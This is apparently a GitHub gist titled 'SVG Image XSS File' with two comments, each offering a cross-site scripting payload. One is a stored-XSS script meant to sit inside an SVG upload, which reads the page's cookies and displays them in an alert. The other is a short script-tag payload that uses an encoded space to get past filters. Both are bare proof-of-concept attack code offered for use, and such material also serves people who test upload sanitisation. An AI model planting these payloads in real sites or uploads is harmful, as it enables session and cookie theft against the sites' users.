@rudSarkar
Created August 12, 2019 18:28
SVG Image XSS File
moh0077 commented Sep 26, 2023

<title>Example of stored XSS with SVG file </title>
<script type="text/javascript">
  // Function to set a cookie
  function setCookie(cookieName, cookieValue, expirationDays) {
    var date = new Date();
    date.setTime(date.getTime() + (expirationDays * 24 * 60 * 60 * 1000));
    var expires = 'expires=' + date.toUTCString();
    document.cookie = cookieName + '=' + encodeURIComponent(cookieValue) + '; ' + expires + '; path=/';
  }
  // create a cookie for this page
  setCookie('username', 'JohnDoe', 7); // Sets a cookie named 'username' with value 'JohnDoe' that expires in 7 days
</script>
<script type="text/javascript">
  // JavaScript code embedded in the SVG
  function getUserCookies() {
    // Read all cookies
    var allCookies = document.cookie;
    alert("Cookies found:" + allCookies)
  }
  // call the function
  getUserCookies();
</script>

@Fadhiadnan

<script\x20type="text/javascript">javascript:alert(1);</script>
